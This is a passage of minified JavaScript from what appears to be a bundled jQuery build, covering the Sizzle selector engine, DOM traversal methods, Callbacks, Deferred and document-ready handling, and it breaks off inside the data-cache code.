M(e.replace(le,"$1"),t,n,i)}function n(){function e(n,i){return t.push(n+" ")>_.cacheLength&&delete e[t.shift()],e[n+" "]=i}var t=[];return e}function i(e){return e[L]=!0,e}function r(e){var t=N.createElement("div");try{return!!e(t)}catch(n){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function o(e,t){for(var n=e.split("|"),i=e.length;i--;)_.attrHandle[n[i]]=t}function s(e,t){var n=t&&e,i=n&&1===e.nodeType&&1===t.nodeType&&(~t.sourceIndex||$)-(~e.sourceIndex||$);if(i)return i;if(n)for(;n=n.nextSibling;)if(n===t)return-1;return e?1:-1}function a(e){return function(t){var n=t.nodeName.toLowerCase();return"input"===n&&t.type===e}}function l(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function d(e){return i(function(t){return t=+t,i(function(n,i){for(var r,o=e([],n.length,t),s=o.length;s--;)n[r=o[s]]&&(n[r]=!(i[r]=n[r]))})})}function c(e){return e&&typeof e.getElementsByTagName!==G&&e}function u(){}function p(e){for(var t=0,n=e.length,i="";n>t;t++)i+=e[t].value;return i}function f(e,t,n){var i=t.dir,r=n&&"parentNode"===i,o=Q++;return t.first?function(t,n,o){for(;t=t[i];)if(1===t.nodeType||r)return e(t,n,o)}:function(t,n,s){var a,l,d=[O,o];if(s){for(;t=t[i];)if((1===t.nodeType||r)&&e(t,n,s))return!0}else for(;t=t[i];)if(1===t.nodeType||r){if(l=t[L]||(t[L]={}),(a=l[i])&&a[0]===O&&a[1]===o)return d[2]=a[2];if(l[i]=d,d[2]=e(t,n,s))return!0}}}function h(e){return e.length>1?function(t,n,i){for(var r=e.length;r--;)if(!e[r](t,n,i))return!1;return!0}:e[0]}function m(e,n,i){for(var r=0,o=n.length;o>r;r++)t(e,n[r],i);return i}function g(e,t,n,i,r){for(var o,s=[],a=0,l=e.length,d=null!=t;l>a;a++)(o=e[a])&&(n&&!n(o,i,r)||(s.push(o),d&&t.push(a)));return s}function A(e,t,n,r,o,s){return r&&!r[L]&&(r=A(r)),o&&!o[L]&&(o=A(o,s)),i(function(i,s,a,l){var d,c,u,p=[],f=[],h=s.length,A=i||m(t||"*",a.nodeType?[a]:a,[]),v=!e||!i&&t?A:g(A,p,e,a,l),y=n?o||(i?e:h||r)?[]:s:v;if(n&&n(v,y,a,l),r)for(d=g(y,f),r(d,[],a,l),c=d.length;c--;)(u=d[c])&&(y[f[c]]=!(v[f[c]]=u));if(i){if(o||e){if(o){for(d=[],c=y.length;c--;)(u=y[c])&&d.push(v[c]=u);o(null,y=[],d,l)}for(c=y.length;c--;)(u=y[c])&&(d=o?te.call(i,u):p[c])>-1&&(i[d]=!(s[d]=u))}}else y=g(y===s?y.splice(h,y.length):y),o?o(null,s,y,l):K.apply(s,y)})}function v(e){for(var t,n,i,r=e.length,o=_.relative[e[0].type],s=o||_.relative[" "],a=o?1:0,l=f(function(e){return e===t},s,!0),d=f(function(e){return te.call(t,e)>-1},s,!0),c=[function(e,n,i){return!o&&(i||n!==k)||((t=n).nodeType?l(e,n,i):d(e,n,i))}];r>a;a++)if(n=_.relative[e[a].type])c=[f(h(c),n)];else{if(n=_.filter[e[a].type].apply(null,e[a].matches),n[L]){for(i=++a;r>i&&!_.relative[e[i].type];i++);return A(a>1&&h(c),a>1&&p(e.slice(0,a-1).concat({value:" "===e[a-2].type?"*":""})).replace(le,"$1"),n,i>a&&v(e.slice(a,i)),r>i&&v(e=e.slice(i)),r>i&&p(e))}c.push(n)}return h(c)}function y(e,n){var r=n.length>0,o=e.length>0,s=function(i,s,a,l,d){var c,u,p,f=0,h="0",m=i&&[],A=[],v=k,y=i||o&&_.find.TAG("*",d),b=O+=null==v?1:Math.random()||.1,w=y.length;for(d&&(k=s!==N&&s);h!==w&&null!=(c=y[h]);h++){if(o&&c){for(u=0;p=e[u++];)if(p(c,s,a)){l.push(c);break}d&&(O=b)}r&&((c=!p&&c)&&f--,i&&m.push(c))}if(f+=h,r&&h!==f){for(u=0;p=n[u++];)p(m,A,s,a);if(i){if(f>0)for(;h--;)m[h]||A[h]||(A[h]=J.call(l));A=g(A)}K.apply(l,A),d&&!i&&A.length>0&&f+n.length>1&&t.uniqueSort(l)}return d&&(O=b,k=v),m};return r?i(s):s}var b,w,_,x,T,E,C,M,k,z,S,B,N,P,j,R,D,F,I,L="sizzle"+-new Date,H=e.document,O=0,Q=0,W=n(),q=n(),U=n(),V=function(e,t){return e===t&&(S=!0),0},G="undefined",$=1<<31,Y={}.hasOwnProperty,Z=[],J=Z.pop,X=Z.push,K=Z.push,ee=Z.slice,te=Z.indexOf||function(e){for(var t=0,n=this.length;n>t;t++)if(this[t]===e)return t;return-1},ne="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",ie="[\\x20\\t\\r\\n\\f]",re="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",oe=re.replace("w","w#"),se="\\["+ie+"*("+re+")(?:"+ie+"*([*^$|!~]?=)"+ie+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+oe+"))|)"+ie+"*\\]",ae=":("+re+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+se+")*)|.*)\\)|)",le=new RegExp("^"+ie+"+|((?:^|[^\\\\])(?:\\\\.)*)"+ie+"+$","g"),de=new RegExp("^"+ie+"*,"+ie+"*"),ce=new RegExp("^"+ie+"*([>+~]|"+ie+")"+ie+"*"),ue=new RegExp("="+ie+"*([^\\]'\"]*?)"+ie+"*\\]","g"),pe=new RegExp(ae),fe=new RegExp("^"+oe+"$"),he={ID:new RegExp("^#("+re+")"),CLASS:new RegExp("^\\.("+re+")"),TAG:new RegExp("^("+re.replace("w","w*")+")"),ATTR:new RegExp("^"+se),PSEUDO:new RegExp("^"+ae),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+ie+"*(even|odd|(([+-]|)(\\d*)n|)"+ie+"*(?:([+-]|)"+ie+"*(\\d+)|))"+ie+"*\\)|)","i"),bool:new RegExp("^(?:"+ne+")$","i"),needsContext:new RegExp("^"+ie+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+ie+"*((?:-\\d)?\\d*)"+ie+"*\\)|)(?=[^-]|$)","i")},me=/^(?:input|select|textarea|button)$/i,ge=/^h\d$/i,Ae=/^[^{]+\{\s*\[native \w/,ve=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ye=/[+~]/,be=/'|\\/g,we=new RegExp("\\\\([\\da-f]{1,6}"+ie+"?|("+ie+")|.)","ig"),_e=function(e,t,n){var i="0x"+t-65536;return i!==i||n?t:0>i?String.fromCharCode(i+65536):String.fromCharCode(i>>10|55296,1023&i|56320)};try{K.apply(Z=ee.call(H.childNodes),H.childNodes),Z[H.childNodes.length].nodeType}catch(xe){K={apply:Z.length?function(e,t){X.apply(e,ee.call(t))}:function(e,t){for(var n=e.length,i=0;e[n++]=t[i++];);e.length=n-1}}}w=t.support={},T=t.isXML=function(e){var t=e&&(e.ownerDocument||e).documentElement;return t?"HTML"!==t.nodeName:!1},B=t.setDocument=function(e){var t,n=e?e.ownerDocument||e:H,i=n.defaultView;return n!==N&&9===n.nodeType&&n.documentElement?(N=n,P=n.documentElement,j=!T(n),i&&i!==i.top&&(i.addEventListener?i.addEventListener("unload",function(){B()},!1):i.attachEvent&&i.attachEvent("onunload",function(){B()})),w.attributes=r(function(e){return e.className="i",!e.getAttribute("className")}),w.getElementsByTagName=r(function(e){return e.appendChild(n.createComment("")),!e.getElementsByTagName("*").length}),w.getElementsByClassName=Ae.test(n.getElementsByClassName)&&r(function(e){return e.innerHTML="<div class='a'></div><div class='a i'></div>",e.firstChild.className="i",2===e.getElementsByClassName("i").length}),w.getById=r(function(e){return P.appendChild(e).id=L,!n.getElementsByName||!n.getElementsByName(L).length}),w.getById?(_.find.ID=function(e,t){if(typeof t.getElementById!==G&&j){var n=t.getElementById(e);return n&&n.parentNode?[n]:[]}},_.filter.ID=function(e){var t=e.replace(we,_e);return function(e){return e.getAttribute("id")===t}}):(delete _.find.ID,_.filter.ID=function(e){var t=e.replace(we,_e);return function(e){var n=typeof e.getAttributeNode!==G&&e.getAttributeNode("id");return n&&n.value===t}}),_.find.TAG=w.getElementsByTagName?function(e,t){return typeof t.getElementsByTagName!==G?t.getElementsByTagName(e):void 0}:function(e,t){var n,i=[],r=0,o=t.getElementsByTagName(e);if("*"===e){for(;n=o[r++];)1===n.nodeType&&i.push(n);return i}return o},_.find.CLASS=w.getElementsByClassName&&function(e,t){return typeof t.getElementsByClassName!==G&&j?t.getElementsByClassName(e):void 0},D=[],R=[],(w.qsa=Ae.test(n.querySelectorAll))&&(r(function(e){e.innerHTML="<select msallowclip=''><option selected=''></option></select>",e.querySelectorAll("[msallowclip^='']").length&&R.push("[*^$]="+ie+"*(?:''|\"\")"),e.querySelectorAll("[selected]").length||R.push("\\["+ie+"*(?:value|"+ne+")"),e.querySelectorAll(":checked").length||R.push(":checked")}),r(function(e){var t=n.createElement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&R.push("name"+ie+"*[*^$|!~]?="),e.querySelectorAll(":enabled").length||R.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),R.push(",.*:")})),(w.matchesSelector=Ae.test(F=P.matches||P.webkitMatchesSelector||P.mozMatchesSelector||P.oMatchesSelector||P.msMatchesSelector))&&r(function(e){w.disconnectedMatch=F.call(e,"div"),F.call(e,"[s!='']:x"),D.push("!=",ae)}),R=R.length&&new RegExp(R.join("|")),D=D.length&&new RegExp(D.join("|")),t=Ae.test(P.compareDocumentPosition),I=t||Ae.test(P.contains)?function(e,t){var n=9===e.nodeType?e.documentElement:e,i=t&&t.parentNode;return e===i||!(!i||1!==i.nodeType||!(n.contains?n.contains(i):e.compareDocumentPosition&&16&e.compareDocumentPosition(i)))}:function(e,t){if(t)for(;t=t.parentNode;)if(t===e)return!0;return!1},V=t?function(e,t){if(e===t)return S=!0,0;var i=!e.compareDocumentPosition-!t.compareDocumentPosition;return i?i:(i=(e.ownerDocument||e)===(t.ownerDocument||t)?e.compareDocumentPosition(t):1,1&i||!w.sortDetached&&t.compareDocumentPosition(e)===i?e===n||e.ownerDocument===H&&I(H,e)?-1:t===n||t.ownerDocument===H&&I(H,t)?1:z?te.call(z,e)-te.call(z,t):0:4&i?-1:1)}:function(e,t){if(e===t)return S=!0,0;var i,r=0,o=e.parentNode,a=t.parentNode,l=[e],d=[t];if(!o||!a)return e===n?-1:t===n?1:o?-1:a?1:z?te.call(z,e)-te.call(z,t):0;if(o===a)return s(e,t);for(i=e;i=i.parentNode;)l.unshift(i);for(i=t;i=i.parentNode;)d.unshift(i);for(;l[r]===d[r];)r++;return r?s(l[r],d[r]):l[r]===H?-1:d[r]===H?1:0},n):N},t.matches=function(e,n){return t(e,null,null,n)},t.matchesSelector=function(e,n){if((e.ownerDocument||e)!==N&&B(e),n=n.replace(ue,"='$1']"),w.matchesSelector&&j&&(!D||!D.test(n))&&(!R||!R.test(n)))try{var i=F.call(e,n);if(i||w.disconnectedMatch||e.document&&11!==e.document.nodeType)return i}catch(r){}return t(n,N,null,[e]).length>0},t.contains=function(e,t){return(e.ownerDocument||e)!==N&&B(e),I(e,t)},t.attr=function(e,t){(e.ownerDocument||e)!==N&&B(e);var n=_.attrHandle[t.toLowerCase()],i=n&&Y.call(_.attrHandle,t.toLowerCase())?n(e,t,!j):void 0;return void 0!==i?i:w.attributes||!j?e.getAttribute(t):(i=e.getAttributeNode(t))&&i.specified?i.value:null},t.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},t.uniqueSort=function(e){var t,n=[],i=0,r=0;if(S=!w.detectDuplicates,z=!w.sortStable&&e.slice(0),e.sort(V),S){for(;t=e[r++];)t===e[r]&&(i=n.push(r));for(;i--;)e.splice(n[i],1)}return z=null,e},x=t.getText=function(e){var t,n="",i=0,r=e.nodeType;if(r){if(1===r||9===r||11===r){if("string"==typeof e.textContent)return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=x(e)}else if(3===r||4===r)return e.nodeValue}else for(;t=e[i++];)n+=x(t);return n},_=t.selectors={cacheLength:50,createPseudo:i,match:he,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace(we,_e),e[3]=(e[3]||e[4]||e[5]||"").replace(we,_e),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||t.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]||1):2*("even"===e[3]||"odd"===e[3])),e[5]=+(e[7]+e[8]||"odd"===e[3])):e[3]&&t.error(e[0]),e},PSEUDO:function(e){var t,n=!e[6]&&e[2];return he.CHILD.test(e[0])?null:(e[3]?e[2]=e[4]||e[5]||"":n&&pe.test(n)&&(t=E(n,!0))&&(t=n.indexOf(")",n.length-t)-n.length)&&(e[0]=e[0].slice(0,t),e[2]=n.slice(0,t)),e.slice(0,3))}},filter:{TAG:function(e){var t=e.replace(we,_e).toLowerCase();return"*"===e?function(){return!0}:function(e){return e.nodeName&&e.nodeName.toLowerCase()===t}},CLASS:function(e){var t=W[e+" "];return t||(t=new RegExp("(^|"+ie+")"+e+"("+ie+"|$)"))&&W(e,function(e){return t.test("string"==typeof e.className&&e.className||typeof e.getAttribute!==G&&e.getAttribute("class")||"")})},ATTR:function(e,n,i){return function(r){var o=t.attr(r,e);return null==o?"!="===n:n?(o+="","="===n?o===i:"!="===n?o!==i:"^="===n?i&&0===o.indexOf(i):"*="===n?i&&o.indexOf(i)>-1:"$="===n?i&&o.slice(-i.length)===i:"~="===n?(" "+o+" ").indexOf(i)>-1:"|="===n?o===i||o.slice(0,i.length+1)===i+"-":!1):!0}},CHILD:function(e,t,n,i,r){var o="nth"!==e.slice(0,3),s="last"!==e.slice(-4),a="of-type"===t;return 1===i&&0===r?function(e){return!!e.parentNode}:function(t,n,l){var d,c,u,p,f,h,m=o!==s?"nextSibling":"previousSibling",g=t.parentNode,A=a&&t.nodeName.toLowerCase(),v=!l&&!a;if(g){if(o){for(;m;){for(u=t;u=u[m];)if(a?u.nodeName.toLowerCase()===A:1===u.nodeType)return!1;h=m="only"===e&&!h&&"nextSibling"}return!0}if(h=[s?g.firstChild:g.lastChild],s&&v){for(c=g[L]||(g[L]={}),d=c[e]||[],f=d[0]===O&&d[1],p=d[0]===O&&d[2],u=f&&g.childNodes[f];u=++f&&u&&u[m]||(p=f=0)||h.pop();)if(1===u.nodeType&&++p&&u===t){c[e]=[O,f,p];break}}else if(v&&(d=(t[L]||(t[L]={}))[e])&&d[0]===O)p=d[1];else for(;(u=++f&&u&&u[m]||(p=f=0)||h.pop())&&((a?u.nodeName.toLowerCase()!==A:1!==u.nodeType)||!++p||(v&&((u[L]||(u[L]={}))[e]=[O,p]),u!==t)););return p-=r,p===i||p%i===0&&p/i>=0}}},PSEUDO:function(e,n){var r,o=_.pseudos[e]||_.setFilters[e.toLowerCase()]||t.error("unsupported pseudo: "+e);return o[L]?o(n):o.length>1?(r=[e,e,"",n],_.setFilters.hasOwnProperty(e.toLowerCase())?i(function(e,t){for(var i,r=o(e,n),s=r.length;s--;)i=te.call(e,r[s]),e[i]=!(t[i]=r[s])}):function(e){return o(e,0,r)}):o}},pseudos:{not:i(function(e){var t=[],n=[],r=C(e.replace(le,"$1"));return r[L]?i(function(e,t,n,i){for(var o,s=r(e,null,i,[]),a=e.length;a--;)(o=s[a])&&(e[a]=!(t[a]=o))}):function(e,i,o){return t[0]=e,r(t,null,o,n),!n.pop()}}),has:i(function(e){return function(n){return t(e,n).length>0}}),contains:i(function(e){return function(t){return(t.textContent||t.innerText||x(t)).indexOf(e)>-1}}),lang:i(function(e){return fe.test(e||"")||t.error("unsupported lang: "+e),e=e.replace(we,_e).toLowerCase(),function(t){var n;do if(n=j?t.lang:t.getAttribute("xml:lang")||t.getAttribute("lang"))return n=n.toLowerCase(),n===e||0===n.indexOf(e+"-");while((t=t.parentNode)&&1===t.nodeType);return!1}}),target:function(t){var n=e.location&&e.location.hash;return n&&n.slice(1)===t.id},root:function(e){return e===P},focus:function(e){return e===N.activeElement&&(!N.hasFocus||N.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},enabled:function(e){return e.disabled===!1},disabled:function(e){return e.disabled===!0},checked:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&!!e.checked||"option"===t&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,e.selected===!0},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeType<6)return!1;return!0},parent:function(e){return!_.pseudos.empty(e)},header:function(e){return ge.test(e.nodeName)},input:function(e){return me.test(e.nodeName)},button:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&"button"===e.type||"button"===t},text:function(e){var t;return"input"===e.nodeName.toLowerCase()&&"text"===e.type&&(null==(t=e.getAttribute("type"))||"text"===t.toLowerCase())},first:d(function(){return[0]}),last:d(function(e,t){return[t-1]}),eq:d(function(e,t,n){return[0>n?n+t:n]}),even:d(function(e,t){for(var n=0;t>n;n+=2)e.push(n);return e}),odd:d(function(e,t){for(var n=1;t>n;n+=2)e.push(n);return e}),lt:d(function(e,t,n){for(var i=0>n?n+t:n;--i>=0;)e.push(i);return e}),gt:d(function(e,t,n){for(var i=0>n?n+t:n;++i<t;)e.push(i);return e})}},_.pseudos.nth=_.pseudos.eq;for(b in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})_.pseudos[b]=a(b);for(b in{submit:!0,reset:!0})_.pseudos[b]=l(b);return u.prototype=_.filters=_.pseudos,_.setFilters=new u,E=t.tokenize=function(e,n){var i,r,o,s,a,l,d,c=q[e+" "];if(c)return n?0:c.slice(0);for(a=e,l=[],d=_.preFilter;a;){i&&!(r=de.exec(a))||(r&&(a=a.slice(r[0].length)||a),l.push(o=[])),i=!1,(r=ce.exec(a))&&(i=r.shift(),o.push({value:i,type:r[0].replace(le," ")}),a=a.slice(i.length));for(s in _.filter)!(r=he[s].exec(a))||d[s]&&!(r=d[s](r))||(i=r.shift(),o.push({value:i,type:s,matches:r}),a=a.slice(i.length));if(!i)break}return n?a.length:a?t.error(e):q(e,l).slice(0)},C=t.compile=function(e,t){var n,i=[],r=[],o=U[e+" "];if(!o){for(t||(t=E(e)),n=t.length;n--;)o=v(t[n]),o[L]?i.push(o):r.push(o);o=U(e,y(r,i)),o.selector=e}return o},M=t.select=function(e,t,n,i){var r,o,s,a,l,d="function"==typeof e&&e,u=!i&&E(e=d.selector||e);if(n=n||[],1===u.length){if(o=u[0]=u[0].slice(0),o.length>2&&"ID"===(s=o[0]).type&&w.getById&&9===t.nodeType&&j&&_.relative[o[1].type]){if(t=(_.find.ID(s.matches[0].replace(we,_e),t)||[])[0],!t)return n;d&&(t=t.parentNode),e=e.slice(o.shift().value.length)}for(r=he.needsContext.test(e)?0:o.length;r--&&(s=o[r],!_.relative[a=s.type]);)if((l=_.find[a])&&(i=l(s.matches[0].replace(we,_e),ye.test(o[0].type)&&c(t.parentNode)||t))){ if(o.splice(r,1),e=i.length&&p(o),!e)return K.apply(n,i),n;break}}return(d||C(e,u))(i,t,!j,n,ye.test(e)&&c(t.parentNode)||t),n},w.sortStable=L.split("").sort(V).join("")===L,w.detectDuplicates=!!S,B(),w.sortDetached=r(function(e){return 1&e.compareDocumentPosition(N.createElement("div"))}),r(function(e){return e.innerHTML="<a href='#'></a>","#"===e.firstChild.getAttribute("href")})||o("type|href|height|width",function(e,t,n){return n?void 0:e.getAttribute(t,"type"===t.toLowerCase()?1:2)}),w.attributes&&r(function(e){return e.innerHTML="<input/>",e.firstChild.setAttribute("value",""),""===e.firstChild.getAttribute("value")})||o("value",function(e,t,n){return n||"input"!==e.nodeName.toLowerCase()?void 0:e.defaultValue}),r(function(e){return null==e.getAttribute("disabled")})||o(ne,function(e,t,n){var i;return n?void 0:e[t]===!0?t.toLowerCase():(i=e.getAttributeNode(t))&&i.specified?i.value:null}),t}(e);re.find=de,re.expr=de.selectors,re.expr[":"]=re.expr.pseudos,re.unique=de.uniqueSort,re.text=de.getText,re.isXMLDoc=de.isXML,re.contains=de.contains;var ce=re.expr.match.needsContext,ue=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,pe=/^.[^:#\[\.,]*$/;re.filter=function(e,t,n){var i=t[0];return n&&(e=":not("+e+")"),1===t.length&&1===i.nodeType?re.find.matchesSelector(i,e)?[i]:[]:re.find.matches(e,re.grep(t,function(e){return 1===e.nodeType}))},re.fn.extend({find:function(e){var t,n=[],i=this,r=i.length;if("string"!=typeof e)return this.pushStack(re(e).filter(function(){for(t=0;r>t;t++)if(re.contains(i[t],this))return!0}));for(t=0;r>t;t++)re.find(e,i[t],n);return n=this.pushStack(r>1?re.unique(n):n),n.selector=this.selector?this.selector+" "+e:e,n},filter:function(e){return this.pushStack(i(this,e||[],!1))},not:function(e){return this.pushStack(i(this,e||[],!0))},is:function(e){return!!i(this,"string"==typeof e&&ce.test(e)?re(e):e||[],!1).length}});var fe,he=e.document,me=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,ge=re.fn.init=function(e,t){var n,i;if(!e)return this;if("string"==typeof e){if(n="<"===e.charAt(0)&&">"===e.charAt(e.length-1)&&e.length>=3?[null,e,null]:me.exec(e),!n||!n[1]&&t)return!t||t.jquery?(t||fe).find(e):this.constructor(t).find(e);if(n[1]){if(t=t instanceof re?t[0]:t,re.merge(this,re.parseHTML(n[1],t&&t.nodeType?t.ownerDocument||t:he,!0)),ue.test(n[1])&&re.isPlainObject(t))for(n in t)re.isFunction(this[n])?this[n](t[n]):this.attr(n,t[n]);return this}if(i=he.getElementById(n[2]),i&&i.parentNode){if(i.id!==n[2])return fe.find(e);this.length=1,this[0]=i}return this.context=he,this.selector=e,this}return e.nodeType?(this.context=this[0]=e,this.length=1,this):re.isFunction(e)?"undefined"!=typeof fe.ready?fe.ready(e):e(re):(void 0!==e.selector&&(this.selector=e.selector,this.context=e.context),re.makeArray(e,this))};ge.prototype=re.fn,fe=re(he);var Ae=/^(?:parents|prev(?:Until|All))/,ve={children:!0,contents:!0,next:!0,prev:!0};re.extend({dir:function(e,t,n){for(var i=[],r=e[t];r&&9!==r.nodeType&&(void 0===n||1!==r.nodeType||!re(r).is(n));)1===r.nodeType&&i.push(r),r=r[t];return i},sibling:function(e,t){for(var n=[];e;e=e.nextSibling)1===e.nodeType&&e!==t&&n.push(e);return n}}),re.fn.extend({has:function(e){var t,n=re(e,this),i=n.length;return this.filter(function(){for(t=0;i>t;t++)if(re.contains(this,n[t]))return!0})},closest:function(e,t){for(var n,i=0,r=this.length,o=[],s=ce.test(e)||"string"!=typeof e?re(e,t||this.context):0;r>i;i++)for(n=this[i];n&&n!==t;n=n.parentNode)if(n.nodeType<11&&(s?s.index(n)>-1:1===n.nodeType&&re.find.matchesSelector(n,e))){o.push(n);break}return this.pushStack(o.length>1?re.unique(o):o)},index:function(e){return e?"string"==typeof e?re.inArray(this[0],re(e)):re.inArray(e.jquery?e[0]:e,this):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(e,t){return this.pushStack(re.unique(re.merge(this.get(),re(e,t))))},addBack:function(e){return this.add(null==e?this.prevObject:this.prevObject.filter(e))}}),re.each({parent:function(e){var t=e.parentNode;return t&&11!==t.nodeType?t:null},parents:function(e){return re.dir(e,"parentNode")},parentsUntil:function(e,t,n){return re.dir(e,"parentNode",n)},next:function(e){return r(e,"nextSibling")},prev:function(e){return r(e,"previousSibling")},nextAll:function(e){return re.dir(e,"nextSibling")},prevAll:function(e){return re.dir(e,"previousSibling")},nextUntil:function(e,t,n){return re.dir(e,"nextSibling",n)},prevUntil:function(e,t,n){return re.dir(e,"previousSibling",n)},siblings:function(e){return re.sibling((e.parentNode||{}).firstChild,e)},children:function(e){return re.sibling(e.firstChild)},contents:function(e){return re.nodeName(e,"iframe")?e.contentDocument||e.contentWindow.document:re.merge([],e.childNodes)}},function(e,t){re.fn[e]=function(n,i){var r=re.map(this,t,n);return"Until"!==e.slice(-5)&&(i=n),i&&"string"==typeof i&&(r=re.filter(i,r)),this.length>1&&(ve[e]||(r=re.unique(r)),Ae.test(e)&&(r=r.reverse())),this.pushStack(r)}});var ye=/\S+/g,be={};re.Callbacks=function(e){e="string"==typeof e?be[e]||o(e):re.extend({},e);var t,n,i,r,s,a,l=[],d=!e.once&&[],c=function(o){for(n=e.memory&&o,i=!0,s=a||0,a=0,r=l.length,t=!0;l&&r>s;s++)if(l[s].apply(o[0],o[1])===!1&&e.stopOnFalse){n=!1;break}t=!1,l&&(d?d.length&&c(d.shift()):n?l=[]:u.disable())},u={add:function(){if(l){var i=l.length;!function o(t){re.each(t,function(t,n){var i=re.type(n);"function"===i?e.unique&&u.has(n)||l.push(n):n&&n.length&&"string"!==i&&o(n)})}(arguments),t?r=l.length:n&&(a=i,c(n))}return this},remove:function(){return l&&re.each(arguments,function(e,n){for(var i;(i=re.inArray(n,l,i))>-1;)l.splice(i,1),t&&(r>=i&&r--,s>=i&&s--)}),this},has:function(e){return e?re.inArray(e,l)>-1:!(!l||!l.length)},empty:function(){return l=[],r=0,this},disable:function(){return l=d=n=void 0,this},disabled:function(){return!l},lock:function(){return d=void 0,n||u.disable(),this},locked:function(){return!d},fireWith:function(e,n){return!l||i&&!d||(n=n||[],n=[e,n.slice?n.slice():n],t?d.push(n):c(n)),this},fire:function(){return u.fireWith(this,arguments),this},fired:function(){return!!i}};return u},re.extend({Deferred:function(e){var t=[["resolve","done",re.Callbacks("once memory"),"resolved"],["reject","fail",re.Callbacks("once memory"),"rejected"],["notify","progress",re.Callbacks("memory")]],n="pending",i={state:function(){return n},always:function(){return r.done(arguments).fail(arguments),this},then:function(){var e=arguments;return re.Deferred(function(n){re.each(t,function(t,o){var s=re.isFunction(e[t])&&e[t];r[o[1]](function(){var e=s&&s.apply(this,arguments);e&&re.isFunction(e.promise)?e.promise().done(n.resolve).fail(n.reject).progress(n.notify):n[o[0]+"With"](this===i?n.promise():this,s?[e]:arguments)})}),e=null}).promise()},promise:function(e){return null!=e?re.extend(e,i):i}},r={};return i.pipe=i.then,re.each(t,function(e,o){var s=o[2],a=o[3];i[o[1]]=s.add,a&&s.add(function(){n=a},t[1^e][2].disable,t[2][2].lock),r[o[0]]=function(){return r[o[0]+"With"](this===r?i:this,arguments),this},r[o[0]+"With"]=s.fireWith}),i.promise(r),e&&e.call(r,r),r},when:function(e){var t,n,i,r=0,o=Y.call(arguments),s=o.length,a=1!==s||e&&re.isFunction(e.promise)?s:0,l=1===a?e:re.Deferred(),d=function(e,n,i){return function(r){n[e]=this,i[e]=arguments.length>1?Y.call(arguments):r,i===t?l.notifyWith(n,i):--a||l.resolveWith(n,i)}};if(s>1)for(t=new Array(s),n=new Array(s),i=new Array(s);s>r;r++)o[r]&&re.isFunction(o[r].promise)?o[r].promise().done(d(r,i,o)).fail(l.reject).progress(d(r,n,t)):--a;return a||l.resolveWith(i,o),l.promise()}});var we;re.fn.ready=function(e){return re.ready.promise().done(e),this},re.extend({isReady:!1,readyWait:1,holdReady:function(e){e?re.readyWait++:re.ready(!0)},ready:function(e){if(e===!0?!--re.readyWait:!re.isReady){if(!he.body)return setTimeout(re.ready);re.isReady=!0,e!==!0&&--re.readyWait>0||(we.resolveWith(he,[re]),re.fn.triggerHandler&&(re(he).triggerHandler("ready"),re(he).off("ready")))}}}),re.ready.promise=function(t){if(!we)if(we=re.Deferred(),"complete"===he.readyState)setTimeout(re.ready);else if(he.addEventListener)he.addEventListener("DOMContentLoaded",a,!1),e.addEventListener("load",a,!1);else{he.attachEvent("onreadystatechange",a),e.attachEvent("onload",a);var n=!1;try{n=null==e.frameElement&&he.documentElement}catch(i){}n&&n.doScroll&&!function r(){if(!re.isReady){try{n.doScroll("left")}catch(e){return setTimeout(r,50)}s(),re.ready()}}()}return we.promise(t)};var _e,xe="undefined";for(_e in re(ne))break;ne.ownLast="0"!==_e,ne.inlineBlockNeedsLayout=!1,re(function(){var e,t,n,i;n=he.getElementsByTagName("body")[0],n&&n.style&&(t=he.createElement("div"),i=he.createElement("div"),i.style.cssText="position:absolute;border:0;width:0;height:0;top:0;left:-9999px",n.appendChild(i).appendChild(t),typeof t.style.zoom!==xe&&(t.style.cssText="display:inline;margin:0;border:0;padding:1px;width:1px;zoom:1",ne.inlineBlockNeedsLayout=e=3===t.offsetWidth,e&&(n.style.zoom=1)),n.removeChild(i))}),function(){var e=he.createElement("div");if(null==ne.deleteExpando){ne.deleteExpando=!0;try{delete e.test}catch(t){ne.deleteExpando=!1}}e=null}(),re.acceptData=function(e){var t=re.noData[(e.nodeName+" ").toLowerCase()],n=+e.nodeType||1;return 1!==n&&9!==n?!1:!t||t!==!0&&e.getAttribute("classid")===t};var Te=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,Ee=/([A-Z])/g;re.extend({cache:{},noData:{"applet ":!0,"embed ":!0,"object ":"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"},hasData:function(e){return e=e.nodeType?re.cache[e[re.expando]]:e[re.expando],!!e&&!d(e)},data:function(e,t,n){return c(e,t,n)},removeData:function(e,t){return u(e,t)},_data:function(e,t,n){return c(e,t,n,!0)},_removeData:function(e,t){return 